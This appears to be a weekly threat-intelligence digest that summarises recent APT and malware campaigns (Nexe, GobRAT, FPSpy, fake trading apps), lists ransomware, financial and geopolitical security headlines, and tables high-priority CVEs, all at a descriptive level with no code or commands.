Patchwork APT targets Chinese entities with Nexe backdoor
Cyble researchers identified an ongoing campaign by the Patchwork advanced persistent threat (APT) actor, likely aimed at Chinese entities, that delivers a new backdoor, dubbed Nexe. As an initial infection vector, the threat actor utilises a malicious LNK file that is likely delivered via phishing emails. The file executes a PowerShell script responsible for downloading two files, including a PDF lure and a malicious DLL. The campaign uses DLL sideloading techniques to execute the downloaded DLL, which is responsible for decrypting and executing shellcode that both modifies the AMSIscanBuffer and ETWEventWrite APIs, and delivers Nexe. The modification is aimed at evading detection mechanisms, enabling the malware to stealthily operate. Nexe is responsible for collecting system information such as the Process ID, public and private IP addresses, usernames, and more.
Bulbature and GobRAT used to turn compromised edge devices into ORBs
Since mid-2023, Sekoia researchers have investigated an infrastructure which consists of edge devices compromised by GobRAT and Bulbature malware. The attackers run Bash scripts that download the malware from deployed staging servers, ultimately transforming targeted devices into Operational Relay Boxes (ORBs) that can launch further attacks. The infrastructure consists of over 75,000 compromised hosts in a total of 139 countries, with the United States, Hong Kong, and Sweden being the most impacted. GobRAT is a remote access trojan (RAT) that is written in Go and provides 22 types of commands enabling reverse shell operations, distributed denial-of-service attacks, reading and writing files, and more. Bulbature is an implant that is leveraged to transform targeted edge devices into an ORB and relay attacks against final target networks. Bulbature’s behaviour is considered more complex than GobRAT. The infrastructure is believed to be used by several threat actors originating from China.
Sparkling Pisces uses KLogEXE and FPSpy to target South Korea and Japan
Palo Alto Networks Unit 42 researchers discovered two previously undocumented malware, dubbed KLogEXE and FPSpy, used by the North Korean threat actor, Sparkling Pisces. KLogEXE is a keylogger written in C++ and collects information on currently running applications, engages in keylogging, and monitors mouse clicks. FPSpy is a backdoor capable of keylogging, as well as storing configuration and system information, downloading and executing additional encrypted modules, and more. Based on code and behavioural similarities, FPSpy appears to be a variant of a malware used in a campaign detailed by ASEC researchers in 2022. The malware also shares characteristics with the KGHSpy backdoor discovered in 2020. Code similarity was also observed between KLogEXE and FPSpy. Most of the observed targets originated from South Korea and Japan.
Transparent Tribe targets India in campaign using Mythic Poseidon binaries
CYFIRMA researchers observed an ongoing campaign, attributed to Transparent Tribe, that is currently targeting India. The researchers identified 15 servers hosting Mythic C2 infrastructure that is associated with ongoing attacks utilising customised payloads, such as Mythic Poseidon binaries. As an initial access vector, Transparent Tribe distributes malicious Linux desktop entry files disguised as PDFs, with the files ultimately used to run malicious binaries that establish persistent access and help evade detection. Transparent Tribe is believed to be increasingly targeting Linux environments due to their widespread use in Indian government sectors. In particular, the Debian-based BOSS OS is used across various ministries and defence forces.
Fake Android and iOS mobile trading apps distributed in pig butchering scheme
Since May 2024, Group-IB researchers identified multiple fake Android and iOS apps, collectively classified under the UniShadowTrade malware family, that are disguised as trading or cryptocurrency platforms used in pig butchering schemes. Victims are typically lured through dating apps or social networks, with the attackers using social engineering to gain their trust. The apps were developed with the Uni–App cross-platform framework and initially distributed via the Google Play and Apple App stores. The attackers began distributing the apps through phishing websites after they were removed from the official stores. Once installed, users are instructed to trust the Enterprise developer profile, register with the app, and follow a set of investment instructions that result in the theft of their funds. The fake apps support English, Portuguese, Chinese, and Hindi, and have targeted victims in the Asia-Pacific, Europe, the Middle East, and Africa.
Ransomware
Volume of blog posts by operators during the last week.
Security Brief: Royal Mail Lures Deliver Open Source Prince RansomwareProofpoint US Blog – Oct 02 2024Is MEOW Ransomware Getting Its Claws Out?Cyberint – Oct 02 2024Key Group: another ransomware group using leaked buildersITSecurityNews.info – Oct 01 2024LockBit power cut: four new arrests and financial sanctions against affiliates Europol – Publications & Documents – Oct 01 2024JPCERT shares Windows Event Log tips to detect ransomware attacksBleeping Computer – Sep 30 2024Storm-0501: Ransomware attacks expanding to hybrid cloud environmentsMicrosoft Security Blog – Sep 26 2024
Financial Services
Data Leak Strikes Latin America’s Financial Institutions: Fintech App at the CenterMedium Cybersecurity – Oct 03 2024Cyberattack on Russian financial sector: Banks and telecom hitRBC Ukraine – Oct 02 2024Crypto-Stealing Code Lurking in Python Package DependenciesCheckmarx – Oct 01 2024The Cryptocurrency Drainer Hiding on Google PlayCheck Point Blog – Sep 26 2024Treasury Takes Coordinated Actions Against Illicit Russian Virtual Currency Exchanges and Cybercrime FacilitatorUS Department of the Treasury – Featured Stories – Sep 26 2024
Geopolitics
China-Backed APT Group Culling Thai Government DataDark Reading – Oct 03 2024Threat Actor Claims Breach of Indonesian Government DatabaseDaily Dark Web – Oct 02 2024Threat Actor Claims to Have Breached High-Profile Israeli InstitutionsDaily Dark Web – Sep 30 2024UK and US issue alert over cyber actors working on behalf of Iranian stateNational Cyber Security Centre – Sep 27 2024SilentSelfie: Uncovering a major watering hole campaign against Kurdish websitesSekoia Blog – Sep 25 2024
High Priority Vulnerabilities
Name | Software | Base Score |
Temp Score |
|
---|---|---|---|---|
CVE-2024-29824 | Endpoint Manager | 7.3 | 7.0 | |
Related: Critical Ivanti RCE flaw with public exploit now used in attacks | ||||
CVE-2023-25280 | DIR820LA1 | 9.8 | 5.3 | |
Related: SAP, D-Link flaws among 4 added to Known Exploited Vulnerabilities catalog | ||||
CVE-2024-34102 | Magento | 9.8 | 9.4 | |
Related: CosmicSting flaw exploited to hack 5% of all Adobe Commerce and Magento stores | ||||
CVE-2017-10271 | WebLogic Server | 9.8 | 9.4 | |
Related: Hadooken and K4Spreader: The 8220 Gang’s Latest Arsenal | ||||
CVE-2024-27956 | Automatic Plugin | 9.9 | 7.1 | |
Related: Cyble Honeypot Sensors Detect WordPress Plugin Attack, New Banking Trojan |